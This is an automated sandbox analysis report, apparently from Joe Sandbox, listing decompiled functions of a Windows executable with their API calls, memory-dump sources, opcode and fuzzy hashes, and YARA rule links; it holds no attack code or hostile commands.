                                                                                                                                                                                                                • Instruction ID: 0a95abeaf907522bb910ccff47ca5b8cdb65f95d12881c86cce1eb50970c9d0a
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4a364c3b246f50765ea579ebeb5236c2c367babb38bf5793ee33ccca847a6907
                                                                                                                                                                                                                • Instruction Fuzzy Hash: E921F032200510ABD310EF29DC49F6EB7E8EF44725F008A6FF844E72D1DBB4A8418B99
                                                                                                                                                                                                                Function 0044719B Relevance: 7.6, APIs: 5, Instructions: 70COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • DeleteObject.GDI32(00000000), ref: 004471D8
                                                                                                                                                                                                                • ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                                                                                                                                                                                                • SelectObject.GDI32(?,00000000), ref: 00447228
                                                                                                                                                                                                                • BeginPath.GDI32(?), ref: 0044723D
                                                                                                                                                                                                                • SelectObject.GDI32(?,00000000), ref: 00447266
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Object$Select$BeginCreateDeletePath
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2338827641-0
                                                                                                                                                                                                                • Opcode ID: 2b4904aa023ab9776d85036867689c5727337e5a2013c968bceed19ab76b7b02
                                                                                                                                                                                                                • Instruction ID: fd3aca4fc88a528095528039be3f852d236b7ebb9f74560e76bd8f11b15fbd2f
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2b4904aa023ab9776d85036867689c5727337e5a2013c968bceed19ab76b7b02
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 92214F71905204AFEB10DF689D48A9E7FACFB16310F14466BF910D32A1DBB49C85CBAD
                                                                                                                                                                                                                Function 00434582 Relevance: 7.6, APIs: 5, Instructions: 61sleepCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • Sleep.KERNEL32(00000000), ref: 00434598
                                                                                                                                                                                                                • QueryPerformanceCounter.KERNEL32(?), ref: 004345B5
                                                                                                                                                                                                                • Sleep.KERNEL32(00000000), ref: 004345D4
                                                                                                                                                                                                                • QueryPerformanceCounter.KERNEL32(?), ref: 004345DE
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CounterPerformanceQuerySleep
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2875609808-0
                                                                                                                                                                                                                • Opcode ID: e7bcee6603ab5961272028a34fb999977f673cbbb9fa03059816f244ade9b228
                                                                                                                                                                                                                • Instruction ID: a92d15520113c221d818f77e193bed66bb4dcccdbbd961c90b57f37ba003579f
                                                                                                                                                                                                                • Opcode Fuzzy Hash: e7bcee6603ab5961272028a34fb999977f673cbbb9fa03059816f244ade9b228
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 37118232D0011DA7CF00EF99DD49AEEBB78FF99721F00456AEE4473240DA3465618BE9
                                                                                                                                                                                                                Function 00460C01 Relevance: 7.5, APIs: 5, Instructions: 48windowtimeCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetDlgItem.USER32(?,000003E9), ref: 00460C17
                                                                                                                                                                                                                • GetWindowTextW.USER32(00000000,?,00000100), ref: 00460C2E
                                                                                                                                                                                                                • MessageBeep.USER32(00000000), ref: 00460C46
                                                                                                                                                                                                                • KillTimer.USER32(?,0000040A), ref: 00460C68
                                                                                                                                                                                                                • EndDialog.USER32(?,00000001), ref: 00460C83
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3741023627-0
                                                                                                                                                                                                                • Opcode ID: 1f18e2cfcdf944224a2d79a82bd846e8569cbd7b4094970ae8d1428a0e6a4617
                                                                                                                                                                                                                • Instruction ID: 069ac2582a8c3c153a507cef710a9e07e91c6f457c78871e3a9641c65eda6ae6
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1f18e2cfcdf944224a2d79a82bd846e8569cbd7b4094970ae8d1428a0e6a4617
                                                                                                                                                                                                                • Instruction Fuzzy Hash: AB01DD315403086BE7349B54EE8DBDB737CFB14705F00465FB645921C0E7F4A9948B95
                                                                                                                                                                                                                Function 004556A0 Relevance: 7.5, APIs: 5, Instructions: 45windowCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Destroy$DeleteObjectWindow$Icon
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 4023252218-0
                                                                                                                                                                                                                • Opcode ID: 3835efce57e2eefc6c6d584a426a71e2dd3a2f260109f85cc330253665e7d223
                                                                                                                                                                                                                • Instruction ID: b4c4dbb9b59ba1bd7f08d964dfa6937d7ad9fb038e30cf105cf785d591c64ca0
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3835efce57e2eefc6c6d584a426a71e2dd3a2f260109f85cc330253665e7d223
                                                                                                                                                                                                                • Instruction Fuzzy Hash: D5014870301A01DBDB10EF65E9D8A2B77A8BF48762F10462AFD04D7352D739D849CBA9
                                                                                                                                                                                                                Function 004555ED Relevance: 7.5, APIs: 5, Instructions: 43windowCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • SendMessageW.USER32(?,00001101,00000000,?), ref: 004555FC
                                                                                                                                                                                                                • DeleteObject.GDI32(?), ref: 00455736
                                                                                                                                                                                                                • DeleteObject.GDI32(?), ref: 00455744
                                                                                                                                                                                                                • DestroyIcon.USER32(?), ref: 00455752
                                                                                                                                                                                                                • DestroyWindow.USER32(?), ref: 00455760
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: DeleteDestroyObject$IconMessageSendWindow
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1489400265-0
                                                                                                                                                                                                                • Opcode ID: 7dd20da83386a23a1814408c1199d2c33e99a8c26f67204b6fd348d50f61361a
                                                                                                                                                                                                                • Instruction ID: 3262712e9a8127eed33bb9eb3d9864066e7dde5d47db0d590f2b6463dd6d37f9
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7dd20da83386a23a1814408c1199d2c33e99a8c26f67204b6fd348d50f61361a
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 07017C74300601DBCB10EF25EEC8A2A73A8BF48712F004569FE019B286D778DC49CB68
                                                                                                                                                                                                                Function 00455607 Relevance: 7.5, APIs: 5, Instructions: 42windowCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 00430003: InvalidateRect.USER32(?,00000000,00000001), ref: 00430091
                                                                                                                                                                                                                • DestroyWindow.USER32(?), ref: 00455728
                                                                                                                                                                                                                • DeleteObject.GDI32(?), ref: 00455736
                                                                                                                                                                                                                • DeleteObject.GDI32(?), ref: 00455744
                                                                                                                                                                                                                • DestroyIcon.USER32(?), ref: 00455752
                                                                                                                                                                                                                • DestroyWindow.USER32(?), ref: 00455760
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Destroy$DeleteObjectWindow$IconInvalidateRect
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1042038666-0
                                                                                                                                                                                                                • Opcode ID: 9df849479103f2de49514c9ec76f9cef1897402069f9b01ba3cc14c1fa4130bc
                                                                                                                                                                                                                • Instruction ID: 2016740d4609c4bbd0e5f1cf6dc7522ca00853e433b5032f7809eda0dc31aff9
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9df849479103f2de49514c9ec76f9cef1897402069f9b01ba3cc14c1fa4130bc
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3701F670200601DBCB10EF69E9D8A2B37ACAF49762B00466AFD01D7256D769DC498B69
                                                                                                                                                                                                                Function 00417803 Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • __getptd.LIBCMT ref: 0041780F
                                                                                                                                                                                                                  • Part of subcall function 00417A69: __getptd_noexit.LIBCMT ref: 00417A6C
                                                                                                                                                                                                                  • Part of subcall function 00417A69: __amsg_exit.LIBCMT ref: 00417A79
                                                                                                                                                                                                                • __getptd.LIBCMT ref: 00417826
                                                                                                                                                                                                                • __amsg_exit.LIBCMT ref: 00417834
                                                                                                                                                                                                                • __lock.LIBCMT ref: 00417844
                                                                                                                                                                                                                • __updatetlocinfoEx_nolock.LIBCMT ref: 00417858
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 938513278-0
                                                                                                                                                                                                                • Opcode ID: 82c9f3bbc84dc287df7640515fd49376d4ae64643407e313ceafc36016311655
                                                                                                                                                                                                                • Instruction ID: 276dd8d19a6a3be70f37c916a71154ef36d62806621923b96dbf7b6e4fe89171
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 82c9f3bbc84dc287df7640515fd49376d4ae64643407e313ceafc36016311655
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6DF09632A4C7009AD721BBA6940B7DD33B0AF10768F11415FF541572D2CB6C59C1CB9D
                                                                                                                                                                                                                Function 00413D0E Relevance: 7.5, APIs: 5, Instructions: 24threadCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 004118F0: _doexit.LIBCMT ref: 004118FC
                                                                                                                                                                                                                • ___set_flsgetvalue.LIBCMT ref: 00413D20
                                                                                                                                                                                                                  • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                                                                                                                                                                                                                  • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                                                                                                                                                                                                                • ___fls_getvalue@4.LIBCMT ref: 00413D2B
                                                                                                                                                                                                                  • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                                                                                                                                                                                                                • ___fls_setvalue@8.LIBCMT ref: 00413D3E
                                                                                                                                                                                                                • GetLastError.KERNEL32(00000000,?,00000000), ref: 00413D47
                                                                                                                                                                                                                • ExitThread.KERNEL32 ref: 00413D4E
                                                                                                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 00413D54
                                                                                                                                                                                                                • __freefls@4.LIBCMT ref: 00413D74
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Value$Thread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2403457894-0
                                                                                                                                                                                                                • Opcode ID: 20cce849b0c51a5c00e20c35783146c720bf18a6b0a2527f17bda4bbe7e89b53
                                                                                                                                                                                                                • Instruction ID: 99982f4671f9afe760f134679f3a1374bf557b67af872bc9692f731b59fefeca
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 20cce849b0c51a5c00e20c35783146c720bf18a6b0a2527f17bda4bbe7e89b53
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1AE04F318443056B8F013BB39C1E8CF363C9E0434AB20082ABE1493112DA2C99C1C6BE
                                                                                                                                                                                                                Function 004151AF Relevance: 7.5, APIs: 5, Instructions: 22threadCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 004118F0: _doexit.LIBCMT ref: 004118FC
                                                                                                                                                                                                                • ___set_flsgetvalue.LIBCMT ref: 004151C0
                                                                                                                                                                                                                  • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                                                                                                                                                                                                                  • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                                                                                                                                                                                                                • ___fls_getvalue@4.LIBCMT ref: 004151CB
                                                                                                                                                                                                                  • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                                                                                                                                                                                                                • ___fls_setvalue@8.LIBCMT ref: 004151DD
                                                                                                                                                                                                                • GetLastError.KERNEL32(00000000,?,00000000), ref: 004151E6
                                                                                                                                                                                                                • ExitThread.KERNEL32 ref: 004151ED
                                                                                                                                                                                                                • __freefls@4.LIBCMT ref: 00415209
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Value$ErrorExitLastThread___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 4247068974-0
                                                                                                                                                                                                                • Opcode ID: 3508d61e785490a8cfc18c63a66594c600054726567160c295e9e14b5a274e31
                                                                                                                                                                                                                • Instruction ID: 3b3fb4cf1982b2ada2e5851f983e2cc6228237abb2dca353483d11accd99f00a
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3508d61e785490a8cfc18c63a66594c600054726567160c295e9e14b5a274e31
                                                                                                                                                                                                                • Instruction Fuzzy Hash: E5E0B631848705AECB013BB29D1E9DF3A799E54749B20082ABE1492122EE6C88D1C669
                                                                                                                                                                                                                Function 0044F405 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 302COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID: )$U$\
                                                                                                                                                                                                                • API String ID: 0-3705770531
                                                                                                                                                                                                                • Opcode ID: 028001eb2bff774db3903015b7fa80ce6d69291786b8857f67b928b721b55690
                                                                                                                                                                                                                • Instruction ID: d0f1885598f34d5f764b4f2a5794ec4e3d7857f6dac93f6e146ba8491093b400
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 028001eb2bff774db3903015b7fa80ce6d69291786b8857f67b928b721b55690
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 83C1C074A00249CFEB24CF69C5806AEBBF2FF85304F2481ABD8569B351D739994ACF15
                                                                                                                                                                                                                Function 0046E48D Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 263comCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 004426CD: _wcslen.LIBCMT ref: 004426F9
                                                                                                                                                                                                                • CoInitialize.OLE32(00000000), ref: 0046E505
                                                                                                                                                                                                                • CoCreateInstance.OLE32(00482A08,00000000,00000001,004828A8,?), ref: 0046E51E
                                                                                                                                                                                                                • CoUninitialize.OLE32 ref: 0046E53D
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                                                                                                                                                                                • String ID: .lnk
                                                                                                                                                                                                                • API String ID: 886957087-24824748
                                                                                                                                                                                                                • Opcode ID: 275befd32e5b5cb51e2fc879a9ecc6bbb724afd33f596a1e549e31a6ffdfd8c7
                                                                                                                                                                                                                • Instruction ID: 2644725dabb75134900838bfbf7f9974cf5b6b8c274c659ea1b0544ab4b4cf98
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 275befd32e5b5cb51e2fc879a9ecc6bbb724afd33f596a1e549e31a6ffdfd8c7
                                                                                                                                                                                                                • Instruction Fuzzy Hash: A6A1CB756042019FC700EF65C980E5BB7E9AFC8308F108A5EF9859B392DB35EC45CBA6
                                                                                                                                                                                                                Function 0044E180 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
